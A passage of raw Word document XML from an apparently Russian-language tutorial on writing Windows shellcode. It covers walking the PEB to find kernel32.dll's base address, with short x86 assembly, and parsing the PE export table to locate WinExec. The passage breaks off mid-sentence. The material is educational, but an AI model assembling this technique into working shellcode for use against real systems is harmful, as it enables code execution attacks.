    <w:p w14:paraId="255E69FE" w14:textId="77777777" w:rsidR="008E5E75" w:rsidRPr="00220295" w:rsidRDefault="008E5E75" w:rsidP="008E5E75">
      <w:pPr>
        <w:pStyle w:val="a2"/>
      </w:pPr>
      <w:r w:rsidRPr="00220295">
        <w:t>Получить адрес первой записи списка в </w:t>
      </w:r>
      <w:r w:rsidRPr="00220295">
        <w:rPr>
          <w:rStyle w:val="afff2"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>InMemoryOrderModuleList</w:t>
      </w:r>
      <w:r w:rsidRPr="00220295">
        <w:t> (смещение </w:t>
      </w:r>
      <w:r w:rsidRPr="00220295">
        <w:rPr>
          <w:rStyle w:val="afff2"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>0x14</w:t>
      </w:r>
      <w:r w:rsidRPr="00220295">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32150B71" w14:textId="77777777" w:rsidR="008E5E75" w:rsidRPr="00220295" w:rsidRDefault="008E5E75" w:rsidP="008E5E75">
      <w:pPr>
        <w:pStyle w:val="a2"/>
      </w:pPr>
      <w:r w:rsidRPr="00220295">
        <w:t>Получить адрес второго (</w:t>
      </w:r>
      <w:r w:rsidRPr="00220295">
        <w:rPr>
          <w:rStyle w:val="afff2"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>ntdll.dll</w:t>
      </w:r>
      <w:r w:rsidRPr="00220295">
        <w:t>) запись списка в </w:t>
      </w:r>
      <w:r w:rsidRPr="00220295">
        <w:rPr>
          <w:rStyle w:val="afff2"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>InMemoryOrderModuleList</w:t>
      </w:r>
      <w:r w:rsidRPr="00220295">
        <w:t> (смещение </w:t>
      </w:r>
      <w:r w:rsidRPr="00220295">
        <w:rPr>
          <w:rStyle w:val="afff2"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>0x00</w:t>
      </w:r>
      <w:r w:rsidRPr="00220295">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C64C38B" w14:textId="77777777" w:rsidR="008E5E75" w:rsidRPr="00220295" w:rsidRDefault="008E5E75" w:rsidP="008E5E75">
      <w:pPr>
        <w:pStyle w:val="a2"/>
      </w:pPr>
      <w:r w:rsidRPr="00220295">
        <w:t>Получить адрес третьего (</w:t>
      </w:r>
      <w:r w:rsidRPr="00220295">
        <w:rPr>
          <w:rStyle w:val="afff2"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>kernel32.dll</w:t>
      </w:r>
      <w:r w:rsidRPr="00220295">
        <w:t>) запись списка в </w:t>
      </w:r>
      <w:r w:rsidRPr="00220295">
        <w:rPr>
          <w:rStyle w:val="afff2"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>InMemoryOrderModuleList</w:t>
      </w:r>
      <w:r w:rsidRPr="00220295">
        <w:t> (смещение </w:t>
      </w:r>
      <w:r w:rsidRPr="00220295">
        <w:rPr>
          <w:rStyle w:val="afff2"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>0x00</w:t>
      </w:r>
      <w:r w:rsidRPr="00220295">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70AE8F00" w14:textId="77777777" w:rsidR="008E5E75" w:rsidRPr="00220295" w:rsidRDefault="008E5E75" w:rsidP="008E5E75">
      <w:pPr>
        <w:pStyle w:val="a2"/>
      </w:pPr>
      <w:r w:rsidRPr="00220295">
        <w:t>Получить базовый адрес </w:t>
      </w:r>
      <w:r w:rsidRPr="00220295">
        <w:rPr>
          <w:rStyle w:val="afff2"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>kernel32.dll</w:t>
      </w:r>
      <w:r w:rsidRPr="00220295">
        <w:t> (смещение </w:t>
      </w:r>
      <w:r w:rsidRPr="00220295">
        <w:rPr>
          <w:rStyle w:val="afff2"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>0x10</w:t>
      </w:r>
      <w:r w:rsidRPr="00220295">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B0D53A" w14:textId="77777777" w:rsidR="008E5E75" w:rsidRPr="00220295" w:rsidRDefault="008E5E75" w:rsidP="008E5E75">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Представим это в виде кода на языке ассемблера:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F1175E" w14:textId="77777777" w:rsidR="008E5E75" w:rsidRPr="00E47F75" w:rsidRDefault="008E5E75" w:rsidP="008E5E75">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E47F75">
        <w:rPr>
          <w:rStyle w:val="nf"/>
        </w:rPr>
        <w:t>mov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nb"/>
        </w:rPr>
        <w:t>ebx</w:t>
      </w:r>
      <w:r w:rsidRPr="00E47F75">
        <w:rPr>
          <w:rStyle w:val="p"/>
        </w:rPr>
        <w:t>,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nb"/>
        </w:rPr>
        <w:t>fs</w:t>
      </w:r>
      <w:r w:rsidRPr="00E47F75">
        <w:rPr>
          <w:rStyle w:val="p"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E47F75">
        <w:rPr>
          <w:rStyle w:val="mh"/>
        </w:rPr>
        <w:t>0x30</w:t>
      </w:r>
      <w:r w:rsidRPr="00E47F75">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00E47F75">
        <w:rPr>
          <w:rStyle w:val="c1"/>
        </w:rPr>
        <w:t>; Get pointer to PEB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791A5061" w14:textId="77777777" w:rsidR="008E5E75" w:rsidRPr="00E47F75" w:rsidRDefault="008E5E75" w:rsidP="008E5E75">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E47F75">
        <w:rPr>
          <w:rStyle w:val="nf"/>
        </w:rPr>
        <w:t>mov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nb"/>
        </w:rPr>
        <w:t>ebx</w:t>
      </w:r>
      <w:r w:rsidRPr="00E47F75">
        <w:rPr>
          <w:rStyle w:val="p"/>
        </w:rPr>
        <w:t>,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p"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00E47F75">
        <w:rPr>
          <w:rStyle w:val="nb"/>
        </w:rPr>
        <w:t>ebx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o"/>
        </w:rPr>
        <w:t>+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mh"/>
        </w:rPr>
        <w:t>0x0C</w:t>
      </w:r>
      <w:r w:rsidRPr="00E47F75">
        <w:rPr>
          <w:rStyle w:val="p"/>
        </w:rPr>
        <w:t>]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c1"/>
        </w:rPr>
        <w:t>; Get pointer to PEB_LDR_DATA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018A9446" w14:textId="77777777" w:rsidR="008E5E75" w:rsidRPr="00E47F75" w:rsidRDefault="008E5E75" w:rsidP="008E5E75">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E47F75">
        <w:rPr>
          <w:rStyle w:val="nf"/>
        </w:rPr>
        <w:t>mov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nb"/>
        </w:rPr>
        <w:t>ebx</w:t>
      </w:r>
      <w:r w:rsidRPr="00E47F75">
        <w:rPr>
          <w:rStyle w:val="p"/>
        </w:rPr>
        <w:t>,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p"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00E47F75">
        <w:rPr>
          <w:rStyle w:val="nb"/>
        </w:rPr>
        <w:t>ebx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o"/>
        </w:rPr>
        <w:t>+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mh"/>
        </w:rPr>
        <w:t>0x14</w:t>
      </w:r>
      <w:r w:rsidRPr="00E47F75">
        <w:rPr>
          <w:rStyle w:val="p"/>
        </w:rPr>
        <w:t>]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c1"/>
        </w:rPr>
        <w:t>; Get pointer to first entry in InMemoryOrderModuleList</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C66FECC" w14:textId="77777777" w:rsidR="008E5E75" w:rsidRPr="00E47F75" w:rsidRDefault="008E5E75" w:rsidP="008E5E75">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E47F75">
        <w:rPr>
          <w:rStyle w:val="nf"/>
        </w:rPr>
        <w:t>mov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nb"/>
        </w:rPr>
        <w:t>ebx</w:t>
      </w:r>
      <w:r w:rsidRPr="00E47F75">
        <w:rPr>
          <w:rStyle w:val="p"/>
        </w:rPr>
        <w:t>,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p"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00E47F75">
        <w:rPr>
          <w:rStyle w:val="nb"/>
        </w:rPr>
        <w:t>ebx</w:t>
      </w:r>
      <w:r w:rsidRPr="00E47F75">
        <w:rPr>
          <w:rStyle w:val="p"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00E47F75">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00E47F75">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00E47F75">
        <w:rPr>
          <w:rStyle w:val="c1"/>
        </w:rPr>
        <w:t>; Get pointer to second (ntdll.dll) entry in InMemoryOrderModuleList</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5649A8E2" w14:textId="77777777" w:rsidR="008E5E75" w:rsidRPr="00E47F75" w:rsidRDefault="008E5E75" w:rsidP="008E5E75">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E47F75">
        <w:rPr>
          <w:rStyle w:val="nf"/>
        </w:rPr>
        <w:t>mov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nb"/>
        </w:rPr>
        <w:t>ebx</w:t>
      </w:r>
      <w:r w:rsidRPr="00E47F75">
        <w:rPr>
          <w:rStyle w:val="p"/>
        </w:rPr>
        <w:t>,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p"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00E47F75">
        <w:rPr>
          <w:rStyle w:val="nb"/>
        </w:rPr>
        <w:t>ebx</w:t>
      </w:r>
      <w:r w:rsidRPr="00E47F75">
        <w:rPr>
          <w:rStyle w:val="p"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00E47F75">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00E47F75">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00E47F75">
        <w:rPr>
          <w:rStyle w:val="c1"/>
        </w:rPr>
        <w:t>; Get pointer to third (kernel32.dll) entry in InMemoryOrderModuleList</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E0C40F" w14:textId="77777777" w:rsidR="008E5E75" w:rsidRPr="00E47F75" w:rsidRDefault="008E5E75" w:rsidP="008E5E75">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E47F75">
        <w:rPr>
          <w:rStyle w:val="nf"/>
        </w:rPr>
        <w:t>mov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nb"/>
        </w:rPr>
        <w:t>ebx</w:t>
      </w:r>
      <w:r w:rsidRPr="00E47F75">
        <w:rPr>
          <w:rStyle w:val="p"/>
        </w:rPr>
        <w:t>,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p"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00E47F75">
        <w:rPr>
          <w:rStyle w:val="nb"/>
        </w:rPr>
        <w:t>ebx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o"/>
        </w:rPr>
        <w:t>+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mh"/>
        </w:rPr>
        <w:t>0x10</w:t>
      </w:r>
      <w:r w:rsidRPr="00E47F75">
        <w:rPr>
          <w:rStyle w:val="p"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00E47F75">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E47F75">
        <w:rPr>
          <w:rStyle w:val="c1"/>
        </w:rPr>
        <w:t>; Get kernel32.dll base address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CE6B1C" w14:textId="77777777" w:rsidR="008E5E75" w:rsidRPr="00E47F75" w:rsidRDefault="008E5E75" w:rsidP="008E5E75">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00EFEE16" w14:textId="46279519" w:rsidR="008E5E75" w:rsidRPr="00E47F75" w:rsidRDefault="008E5E75" w:rsidP="008E5E75">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E47F75">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Теперь, когда у нас есть базовый адрес </w:t>
      </w:r>
      <w:r w:rsidRPr="00E47F75">
        <w:rPr>
          <w:rStyle w:val="afff2"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>kernel32.dll</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="afff2"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00E47F75">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> пришло время найти адрес функции </w:t>
      </w:r>
      <w:r w:rsidRPr="00E47F75">
        <w:rPr>
          <w:rStyle w:val="afff2"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>WinExec</w:t>
      </w:r>
      <w:r w:rsidRPr="00E47F75">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>. Для этого нам нужно пройти несколько заголовков DLL.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E47F75">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Относительный виртуальный адрес (RVA) — это адрес относительно базового адреса PE-исполняемого файла, когда он загружен в память (RVA не равны смещениям файлов, когда исполняемый файл находится на диске!).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E47F75">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>В формате PE при постоянном RVA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r w:rsidRPr="00E47F75">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">0x3C байт хранится </w:t>
      </w:r>
      <w:r w:rsidRPr="0053412B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">RVA </w:t>
      </w:r>
      <w:r w:rsidRPr="0053412B">
        <w:rPr>
          <w:rStyle w:val="afff2"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>сигнатуры PE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="afff2"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00E47F75">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>которая равна</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0053412B">
        <w:rPr>
          <w:rStyle w:val="afff2"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>0x5045</w:t>
      </w:r>
      <w:r w:rsidRPr="00E47F75">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="002C571E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0053412B">
        <w:rPr>
          <w:rStyle w:val="afff2"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>0x78</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E47F75">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>байт после</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0053412B">
        <w:rPr>
          <w:rStyle w:val="afff2"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>сигнатуры</w:t>
      </w:r>
      <w:r w:rsidRPr="00E47F75">
        <w:rPr>
          <w:rStyle w:val="afff2"/>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0053412B">
        <w:rPr>
          <w:rStyle w:val="afff2"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>PE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E47F75">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>— это RVA для</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0053412B">
        <w:rPr>
          <w:rStyle w:val="afff2"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>таблицы экспорта</w:t>
      </w:r>
      <w:r w:rsidRPr="00E47F75">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> В </w:t>
      </w:r>
      <w:r w:rsidRPr="0053412B">
        <w:rPr>
          <w:rStyle w:val="afff2"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>0x14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E47F75">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>байтах от начала</w:t>
      </w:r>
      <w:r w:rsidR="002C571E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0053412B">
        <w:rPr>
          <w:rStyle w:val="afff2"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>таблицы экспорта</w:t>
      </w:r>
      <w:r w:rsidR="002C571E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E47F75">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>хранится количество функций, которые экспортирует DLL.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0053412B">
        <w:rPr>
          <w:rStyle w:val="afff2"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>0x1C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E47F75">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>байт от начала</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0053412B">
        <w:rPr>
          <w:rStyle w:val="afff2"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>таблицы экспорта</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E47F75">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>хранится RVA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0053412B">
        <w:rPr>
          <w:rStyle w:val="afff2"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>адресной таблицы</w:t>
      </w:r>
      <w:r w:rsidRPr="00E47F75">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>, которая содержит адреса функций.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> В </w:t>
      </w:r>
      <w:r w:rsidRPr="0053412B">
        <w:rPr>
          <w:rStyle w:val="afff2"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>0x20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="afff2"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E47F75">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>байтах от начала </w:t>
      </w:r>
      <w:r w:rsidRPr="0053412B">
        <w:rPr>
          <w:rStyle w:val="afff2"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>таблицы экспорта</w:t>
      </w:r>
      <w:r w:rsidRPr="00E47F75">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t> хранится RVA</w:t>
      </w:r>
      <w:r w:rsidR="002C571E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0053412B">
        <w:rPr>
          <w:rStyle w:val="afff2"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>таблицы указателей имен</w:t>
      </w:r>
      <w:r w:rsidRPr="00E47F75">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>, которая содержит указатели на имена (строки) функций.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> В</w:t>
      </w:r>
      <w:r w:rsidRPr="0053412B">
        <w:rPr>
          <w:rStyle w:val="afff2"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0x24</w:t>
      </w:r>
      <w:r w:rsidR="002C571E">
        <w:rPr>
          <w:rStyle w:val="afff2"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E47F75">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>байтах от начала</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0053412B">
        <w:rPr>
          <w:rStyle w:val="afff2"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>таблицы экспорта</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E47F75">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>хранится RVA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0053412B">
        <w:rPr>
          <w:rStyle w:val="afff2"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>порядковой таблицы</w:t>
      </w:r>
      <w:r w:rsidRPr="00E47F75">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>, которая содержит позицию функции в </w:t>
      </w:r>
      <w:r w:rsidRPr="0053412B">
        <w:rPr>
